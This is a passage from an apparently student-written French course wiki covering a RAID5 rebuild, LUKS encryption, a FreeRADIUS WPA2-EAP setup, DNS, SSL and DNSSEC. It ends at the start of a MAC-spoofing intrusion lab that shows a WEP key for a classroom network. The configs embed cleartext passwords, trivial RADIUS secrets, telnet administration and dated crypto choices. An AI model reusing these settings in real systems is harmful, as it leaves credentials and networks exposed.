&amp;lt;/pre&amp;gt;&lt;br /&gt;
On peut ensuite constater l'avancement de la reconstruction en lançant la même commande assez régulièrement:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:~# cat /proc/mdstat &lt;br /&gt;
Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
md0 : active raid5 xvdf[3] xvdd[0] xvde[1]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
      [===&amp;gt;.................]  recovery = 18.2% (191112/1047552) finish=0.4min speed=31852K/sec&lt;br /&gt;
      &lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@GreenArrow:~# cat /proc/mdstat &lt;br /&gt;
Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
md0 : active raid5 xvdf[3] xvdd[0] xvde[1]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
      [====&amp;gt;................]  recovery = 20.0% (210764/1047552) finish=0.4min speed=30109K/sec&lt;br /&gt;
      &lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@GreenArrow:~# cat /proc/mdstat &lt;br /&gt;
Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
md0 : active raid5 xvdf[3] xvdd[0] xvde[1]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
      [====&amp;gt;................]  recovery = 21.8% (229836/1047552) finish=0.4min speed=32833K/sec&lt;br /&gt;
      &lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@GreenArrow:~# cat /proc/mdstat &lt;br /&gt;
Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
md0 : active raid5 xvdf[3] xvdd[0] xvde[1]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
      [===========&amp;gt;.........]  recovery = 59.6% (626140/1047552) finish=0.2min speed=29816K/sec&lt;br /&gt;
      &lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@GreenArrow:~# cat /proc/mdstat &lt;br /&gt;
Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
md0 : active raid5 xvdf[3] xvdd[0] xvde[1]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
      [==================&amp;gt;..]  recovery = 94.3% (989688/1047552) finish=0.0min speed=30124K/sec&lt;br /&gt;
      &lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@GreenArrow:~# [  446.720069] md: md0: recovery done.&lt;br /&gt;
cat /proc/mdstat &lt;br /&gt;
Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
md0 : active raid5 xvdf[3] xvdd[0] xvde[1]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/3] [UUU]&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Cryptage de données ====&lt;br /&gt;
&lt;br /&gt;
Tout d'abord, nous vérifions grâce à Gparted que la carte SD fournie comporte une seule partition.&lt;br /&gt;
Une fois ce test passé, nous regardons grâce à dmesg où est localisé la carte SD :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/# dmesg&lt;br /&gt;
[...]&lt;br /&gt;
[1126726.403767] mmcblk1: mmc1:59b4 NCard 14.7 GiB&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Notre carte SD se situe donc sur /dev/mmcblk1.&lt;br /&gt;
Nous faisons donc un chiffrage AES avec un hashage SHA256 de la carte SD :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/# cryptsetup luksFormat -c aes -h sha256 /dev/mmcblk1&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous devons alors renseigner un mot de passe pour crypter la clef.&lt;br /&gt;
Ensuite, nous ouvrons la partition Luks, puis nous formatons la carte :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/# cryptsetup luksOpen /dev/sdb1 crypt_sd&lt;br /&gt;
root@zebrasoma:/# mkfs.ext4 /dev/mapper/crypt_sd&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous montons la partition, puis créons un fichier sur la carte :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/# mount /dev/mapper/crypt_sd /mnt&lt;br /&gt;
root@zebrasoma:/# vi /mnt/test.txt #on marque un texte dans le fichier&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Enfin, nous démontons la carte SD et fermons la partition Luks :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/# umount /mnt&lt;br /&gt;
root@zebrasoma:/# cryptsetup luksClose crypt_sd&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous essayons ensuite d'accéder à la carte SD. En renseignant un mauvais mot de passe, une erreur apparaît.&lt;br /&gt;
Cependant, une fois le bon mot de passe renseigné, tout re-devient possible.&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation Wifi par WPA2-EAP ====&lt;br /&gt;
Tout d'abord, nous installons FreeRadius sur notre machine virtuelle.&amp;lt;br /&amp;gt;&lt;br /&gt;
Dans le fichier '''users''', nous renseignons le login et le mot de passe pour se connecter à la borne Wifi : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
GreenArrow Cleartext-Password:=&amp;quot;glopglop&amp;quot;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Dans le fichier '''clients.conf''', nous ajoutons la configuration de la borne E306 et E304 :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
client E306 {&lt;br /&gt;
	ipaddr		= 10.60.1.2&lt;br /&gt;
	secret		= password&lt;br /&gt;
}&lt;br /&gt;
client E304 {&lt;br /&gt;
	ipaddr		= 10.60.1.4&lt;br /&gt;
	secret		= password&lt;br /&gt;
}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ensuite, on passe à la configuration de la borne Wifi. On se connecte en telnet via '''telnet 10.60.1.2''', puis nous rentrons en mode configuration : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
aaa authentication login eap_greenarrow group radius_greenarrow&lt;br /&gt;
radius-server host 193.48.57.162 auth-port 1812 acct-port 1813 key glopglop&lt;br /&gt;
aaa group server radius radius_greenarrow&lt;br /&gt;
server 193.48.57.162 auth-port 1812 acct-port 1813&lt;br /&gt;
&lt;br /&gt;
dot11 ssid SSID_GREENARROW&lt;br /&gt;
vlan 3&lt;br /&gt;
authentication open eap eap_greenarrow&lt;br /&gt;
authentication network-eap eap_greenarrow&lt;br /&gt;
authentication key-management wpa&lt;br /&gt;
mbssid guest-mode&lt;br /&gt;
&lt;br /&gt;
exit&lt;br /&gt;
&lt;br /&gt;
interface Dot11Radio0&lt;br /&gt;
encryption vlan 3 mode ciphers aes-ccm tkip&lt;br /&gt;
ssid SSID_GREENARROW&lt;br /&gt;
&lt;br /&gt;
interface Dot11Radio0.3&lt;br /&gt;
encapsulation dot1Q 3&lt;br /&gt;
no ip route-cache&lt;br /&gt;
bridge-group 3&lt;br /&gt;
bridge-group 3 subscriber-loop-control&lt;br /&gt;
bridge-group 3 spanning-disabled&lt;br /&gt;
bridge-group 3 block-unknown-source&lt;br /&gt;
no bridge-group 3 source-learning&lt;br /&gt;
no bridge-group 3 unicast-flooding &lt;br /&gt;
&lt;br /&gt;
interface GigabitEthernet0.3&lt;br /&gt;
encapsulation dot1Q 3&lt;br /&gt;
bridge-group 3&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois ces modifications effectuées, nous configurons l'interface wlan0 de l'eeePC pour pouvoir se connecter au Wifi à l'aide de '''ifup wlan0''' : &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
auto wlan0&lt;br /&gt;
iface wlan0 inet static&lt;br /&gt;
  address 10.60.6.2&lt;br /&gt;
  netmask 255.255.255.0&lt;br /&gt;
  gateway 10.60.3.1&lt;br /&gt;
  wpa-ssid SSID_GREENARROW&lt;br /&gt;
  wpa-key-mgmt WPA-EAP&lt;br /&gt;
  wpa-identity GreenArrow&lt;br /&gt;
  wpa-password glopglop&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On lance le serveur FreeRadius via freeradius -X (mode debug).&lt;br /&gt;
Sur smartphone, nous arrivons à détecter notre SSID (SSID_GREENARROW). Nous pouvons également ping notre eeePC depuis la machine virtuelle.&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Configuration d'un PCBX ====&lt;/div&gt;</summary>
		<author><name>Ldelecro</name></author>	</entry>

	<entry>
		<id>https://projets-ima.plil.fr/mediawiki/index.php?title=Cahier_2016_groupe_n%C2%B02&amp;diff=35893</id>
		<title>Cahier 2016 groupe n°2</title>
		<link rel="alternate" type="text/html" href="https://projets-ima.plil.fr/mediawiki/index.php?title=Cahier_2016_groupe_n%C2%B02&amp;diff=35893"/>
				<updated>2016-12-12T10:00:58Z</updated>
		
		<summary type="html">&lt;p&gt;Ldelecro : /* Sécurisation Wifi par WPA2-EAP */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Tâche particulière ==&lt;br /&gt;
&lt;br /&gt;
Câblage de la fibre: &lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
Prise de connaissance du sujet de PRA et le choix des tâches particulières. Nous avons également commencer à essayer d'identifier les câbles de fibres déjà existants.&lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
Toujours sur la tâche particulière. Identification de tous les câbles déjà tirés. Test de link de chaque câble. Nous avons également commencé à passer les câbles restants.&lt;br /&gt;
Tous les câbles nécessaires ont été tirés entre les deux salles, tous les link sont up. Nous avons identifié chaque câble par un scotch de couleur différente. Nous avons également percé la gouttière de la E304 pour laisser passer un raccord de fibre proprement. &lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Nous avons pu identifier les câbles déjà présents. Il y a donc 2 câbles déjà tirés entre les 2 piles, 2 câbles qui partent de la E306 jusqu'au boîtier ainsi qu'un câble par salle quid descend dans le local technique. &lt;br /&gt;
* Nous allons donc prolonger les 2 câbles s'arrêtant dans le boîtier et tirer 2 nouveaux câbles entre les deux piles: nous aurons donc 6 fils au total. &lt;br /&gt;
* 2 Grands câbles de 30m ~ -&amp;gt; Estimation de 26m entre les 2 piles.&lt;br /&gt;
* 2 petits câbles de 15m ~ -&amp;gt; Estimation de 13m du boîtier à la pile&lt;br /&gt;
* Retirer le câble ethernet qui était tiré entre les 2 piles.&lt;br /&gt;
* 7 heures passées au total sur la tâche particulière&lt;br /&gt;
[[Fichier:im1.JPG|300px|thumb|left|Fibre passant entre les 2 salles]]&lt;br /&gt;
[[Fichier:im2.JPG|300px|thumb|right|Câbles dans le faux plafond]]&lt;br /&gt;
[[Fichier:im4.JPG|300px|thumb|left|Guide câbles pour le faux plafond]]&lt;br /&gt;
[[Fichier:im5.JPG|300px|thumb|right|Boîtiers contenant les raccords de fibres]]&lt;br /&gt;
[[Fichier:im6.JPG|300px|thumb|left|Les fibres en E304 disponibles]]&lt;br /&gt;
[[Fichier:im7.JPG|300px|thumb|right|Trou dans le cache laissant passer la fibre]] &amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Travail commun ==&lt;br /&gt;
&lt;br /&gt;
* Installation de la machine virtuelle XEN&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
xen-create-image --hostname=GreenArrow --ip=193.48.57.162 --netmask=255.255.255.240 --gateway=193.48.57.172&lt;br /&gt;
  --dir=/usr/local/xen --mirror=http://debian.polytech-lille.fr/debian/ --dist=jessie&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Modification du fichier de configuration de la machine virtuelle pour faire en sorte que les répertoires var et home de la machine virtuelle soient sur des partitions LVM de l'hôte:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
lvcreate -L 10G -n /dev/virtual/ima5-GreenArrow-home -v&lt;br /&gt;
lvcreate -L 10G -n /dev/virtual/ima5-GreenArrow-var -v&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/GreenArrow/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/GreenArrow/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/virtual/ima5-GreenArrow-home,xvdc,w',&lt;br /&gt;
                  'phy:/dev/virtual/ima5-GreenArrow-var,xvdb,w',&lt;br /&gt;
              ]&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* Achat du nom de domaine [http://jjlddelamuerto.space] sur Gandi pour 1.19€ TTC&lt;br /&gt;
&lt;br /&gt;
=== Services Internet ===&lt;br /&gt;
&lt;br /&gt;
==== Serveur SSH ====&lt;br /&gt;
&lt;br /&gt;
Sur notre machine virtuelle nous avons configuré le fichier sshd_config (changement de la ligne PubkeyAuthentication) :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:~# vim /etc/ssh/sshd_config&lt;br /&gt;
&lt;br /&gt;
RSAAuthentication yes&lt;br /&gt;
PubkeyAuthentication yes&lt;br /&gt;
#AuthorizedKeysFile     %h/.ssh/authorized_keys&lt;br /&gt;
&lt;br /&gt;
root@GreenArrow:~# service ssh restart&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous avons ensuite réussi à nous connecter en SSH sur notre VM:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
jjoignau@weppes:~$ ssh root@193.48.57.162&lt;br /&gt;
root@193.48.57.162's password: &lt;br /&gt;
&lt;br /&gt;
The programs included with the Debian GNU/Linux system are free software;&lt;br /&gt;
the exact distribution terms for each program are described in the&lt;br /&gt;
individual files in /usr/share/doc/*/copyright.&lt;br /&gt;
&lt;br /&gt;
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent&lt;br /&gt;
permitted by applicable law.&lt;br /&gt;
Last login: Mon Nov  7 10:06:49 2016&lt;br /&gt;
root@GreenArrow:~# exit&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Serveur DNS ====&lt;br /&gt;
&lt;br /&gt;
Tout d'abord, nous modifions le fichier '''named.conf.local''' pour créer les zones nécessaires :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:/etc/bind# vim /etc/bind/named.conf.local&lt;br /&gt;
zone &amp;quot;jjlddelamuerto.space&amp;quot; IN {&lt;br /&gt;
             type master;&lt;br /&gt;
             file &amp;quot;/etc/bind/db.jjlddelamuerto.space&amp;quot;;&lt;br /&gt;
        };&lt;br /&gt;
&lt;br /&gt;
zone &amp;quot;57.48.193.in-addr.arpa&amp;quot; IN {&lt;br /&gt;
             type master;&lt;br /&gt;
             file &amp;quot;/etc/bind/db.57.48.193.in-addr.arpa&amp;quot;;&lt;br /&gt;
        };&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous créons ensuite les fichiers '''db.jjlddelamuerto.space''' et '''db.57.48.193.in-addr.arpa''' :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
$TTL    604800&lt;br /&gt;
@       IN      SOA     ns.jjlddelamuerto.space. root.jjlddelamuerto.space. (&lt;br /&gt;
                       2016113007       ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
;&lt;br /&gt;
@       IN      NS      ns.jjlddelamuerto.space. &lt;br /&gt;
@       IN      NS      ns6.gandi.net.&lt;br /&gt;
ns      IN      A       193.48.57.162&lt;br /&gt;
www     IN      A       193.48.57.162&lt;br /&gt;
@       IN      A       193.48.57.162&lt;br /&gt;
ns      IN      AAAA       2001:660:4401:60ba:216:3eff:fe80:efa8&lt;br /&gt;
www     IN      AAAA       2001:660:4401:60ba:216:3eff:fe80:efa8&lt;br /&gt;
@       IN      AAAA       2001:660:4401:60ba:216:3eff:fe80:efa8&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
$TTL    604800&lt;br /&gt;
@       IN      SOA     jjlddelamuerto.space. root.jjlddelamuerto.space. (&lt;br /&gt;
                        2016113007      ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
;&lt;br /&gt;
57.48.193.in-addr.arpa.         IN      NS      ns.jjlddelamuerto.space.&lt;br /&gt;
57.48.193.in-addr.arpa.         IN      NS      ns2.gandi.net.&lt;br /&gt;
&lt;br /&gt;
162                             IN      PTR     jjlddelamuerto.space.&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous modifions ensuite le fichier /etc/resolv.conf afin de passer par notre serveur :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:/etc/bind# vim /etc/resolv.conf&lt;br /&gt;
search jjlddelamuerto.space&lt;br /&gt;
nameserver 193.48.57.162&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Enfin, nous vérifions notre configuration :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:/etc/bind# host www.jjlddelamuerto.space&lt;br /&gt;
www.jjlddelamuerto.space has address 193.48.57.162&lt;br /&gt;
www.jjlddelamuerto.space has IPv6 address 2001:660:4401:60ba:216:3eff:fe80:efa8&lt;br /&gt;
&lt;br /&gt;
root@GreenArrow:/etc/bind# host -tany jjlddelamuerto.space&lt;br /&gt;
jjlddelamuerto.space has IPv6 address 2001:660:4401:60ba:216:3eff:fe80:efa8&lt;br /&gt;
jjlddelamuerto.space has address 193.48.57.162&lt;br /&gt;
jjlddelamuerto.space has SOA record ns.jjlddelamuerto.space. root.jjlddelamuerto.space. 2016113007 604800 86400 2419200 604800&lt;br /&gt;
jjlddelamuerto.space name server ns6.gandi.net.&lt;br /&gt;
jjlddelamuerto.space name server ns.jjlddelamuerto.space.&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation de site web par certificat ====&lt;br /&gt;
&lt;br /&gt;
Premièrement, sur Gandi nous lançons l'étape d'achat d'un certificat SSL.&lt;br /&gt;
Puis, sur la VM nous générons le CSR grâce à cette commande:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:/etc/apache2/sites-available/clef# openssl req -nodes -newkey rsa:2048 -sha256 -keyout GreenArrow.key -out GreenArrow.csr&lt;br /&gt;
Generating a 2048 bit RSA private key&lt;br /&gt;
&lt;br /&gt;
If you enter '.', the field will be left blank.&lt;br /&gt;
-----&lt;br /&gt;
Country Name (2 letter code) [AU]:FR&lt;br /&gt;
State or Province Name (full name) [Some-State]:Nord&lt;br /&gt;
Locality Name (eg, city) []:Lille&lt;br /&gt;
Organization Name (eg, company) [Internet Widgits Pty Ltd]:PolytechLille&lt;br /&gt;
Organizational Unit Name (eg, section) []:IMA&lt;br /&gt;
Common Name (e.g. server FQDN or YOUR name) []:jjlddelamuerto.space&lt;br /&gt;
Email Address []:&lt;br /&gt;
A challenge password []:&lt;br /&gt;
An optional company name []:&lt;br /&gt;
&lt;br /&gt;
root@GreenArrow:/etc/apache2/sites-available/clef# ls&lt;br /&gt;
GreenArrow.csr	GreenArrow.key&lt;br /&gt;
&lt;br /&gt;
root@GreenArrow:/etc/apache2/sites-available/clef# cat GreenArrow.csr&lt;br /&gt;
&lt;br /&gt;
-----BEGIN CERTIFICATE REQUEST-----&lt;br /&gt;
&amp;lt;CSR à renseigner sur Gandi lors de l'achat du certificat&amp;gt;&lt;br /&gt;
-----END CERTIFICATE REQUEST-----&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous continuons donc la procédure pour obtenir le certificat, et attendons donc sa mise en place.&lt;br /&gt;
&lt;br /&gt;
Pour recevoir le mail contenant le lien pour activer le certificat, nous installons les packages suivants :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:~# apt-get install postfix mailx&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois le certificat récupéré, nous les copions tous dans le bon répertoire, puis nous hashons le tout :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:/etc/bind# cp certificat.crt /etc/ssl/certs/jjlddelamuerto.space.crt&lt;br /&gt;
root@GreenArrow:/etc/bind# cp serveur.key /etc/ssl/private/jjlddelamuerto.space.key&lt;br /&gt;
root@GreenArrow:/etc/bind# cp GandiStandardSSLCA2.pem /etc/ssl/certs/GandiStandardSSLCA2.pem&lt;br /&gt;
root@GreenArrow:/etc/bind# c_rehash /etc/ssl/certs&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Enfin, la dernière étape consiste en la modification des fichiers 000-jjlddelamuerto.space-ssl.conf et ports.conf :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:/etc/apache2/sites-available# cat 000-jjlddelamuerto.space-ssl.conf &lt;br /&gt;
     &amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
         ServerName www.jjlddelamuerto.space&lt;br /&gt;
         ServerAlias jjlddelamuerto.space&lt;br /&gt;
         DocumentRoot /var/www/&lt;br /&gt;
         CustomLog /var/log/apache2/secure_access.log combined&lt;br /&gt;
   &lt;br /&gt;
         SSLEngine on&lt;br /&gt;
         SSLCertificateFile /etc/ssl/certs/jjlddelamuerto.space.crt&lt;br /&gt;
         SSLCertificateKeyFile /etc/ssl/private/jjlddelamuerto.space.key&lt;br /&gt;
         SSLCertificateChainFile /etc/ssl/certs/GandiStandardSSLCA2.pem&lt;br /&gt;
         SSLVerifyClient None&lt;br /&gt;
     &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
root@GreenArrow:/etc/apache2# cat ports.conf &lt;br /&gt;
Listen 80&lt;br /&gt;
&lt;br /&gt;
&amp;lt;IfModule ssl_module&amp;gt;&lt;br /&gt;
	Listen 443&lt;br /&gt;
&amp;lt;/IfModule&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;IfModule mod_gnutls.c&amp;gt;&lt;br /&gt;
	Listen 443&lt;br /&gt;
&amp;lt;/IfModule&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Un redémarrage du service apache2 est maintenant nécessaire :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:/etc/apache2# service apache2 stop&lt;br /&gt;
root@GreenArrow:/etc/apache2# service apache2 start&lt;br /&gt;
root@GreenArrow:/etc/apache2# service apache2 reload&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous pouvons voir que notre  site [https://jjlddelamuerto.space] est maintenant sécurisé, un cadenas vert est bien présent.&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation de serveur DNS par DNSSEC ====&lt;br /&gt;
&lt;br /&gt;
Génération des clefs asymétriques:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
   dnssec-keygen -a RSASHA1 -b 2048 -r /dev/urandom -f KSK -n ZONE jjlddelamuerto.space&lt;br /&gt;
   dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE jjlddelamuerto.space&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On modifie le nom des clefs:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:/etc/bind/jjlddelamuerto.space.dnssec# ls&lt;br /&gt;
dsset-jjlddelamuerto.space.	  jjlddelamuerto.space-zsk.key&lt;br /&gt;
jjlddelamuerto.space-ksk.key	  jjlddelamuerto.space-zsk.private&lt;br /&gt;
jjlddelamuerto.space-ksk.private&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ensuite nous signons les zones:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:/etc/bind/jjlddelamuerto.space.dnssec# dnssec-signzone -o jjlddelamuerto.space -k jjlddelamuerto.space-ksk &lt;br /&gt;
../db.jjlddelamuerto.space jjlddelamuerto.space-zsk&lt;br /&gt;
Verifying the zone using the following algorithms: RSASHA1.&lt;br /&gt;
Zone fully signed:&lt;br /&gt;
Algorithm: RSASHA1: KSKs: 1 active, 0 stand-by, 0 revoked&lt;br /&gt;
                    ZSKs: 1 active, 0 stand-by, 0 revoked&lt;br /&gt;
../db.jjlddelamuerto.space.signed&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour finir nous ajoutons la clef KSK sur Gandi avec l'algorithme RSA/SHA1.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:jjlddnssec.png]]&lt;br /&gt;
&lt;br /&gt;
=== Tests d'intrusion ===&lt;br /&gt;
&lt;br /&gt;
==== Intrusion par changement d'adresse MAC ====&lt;br /&gt;
&lt;br /&gt;
Tout d'abord nous modifions le fichier /etc/network/interfaces:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# vim /etc/network/interfaces&lt;br /&gt;
auto wlan5&lt;br /&gt;
iface wlan5 inet static&lt;br /&gt;
        address 172.26.79.21&lt;br /&gt;
        netmask 255.255.240.0&lt;br /&gt;
        gateway 172.26.79.254&lt;br /&gt;
        wireless mode-managed&lt;br /&gt;
        wireless-essid Wolverine&lt;br /&gt;
        wireless-key 0123456789&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
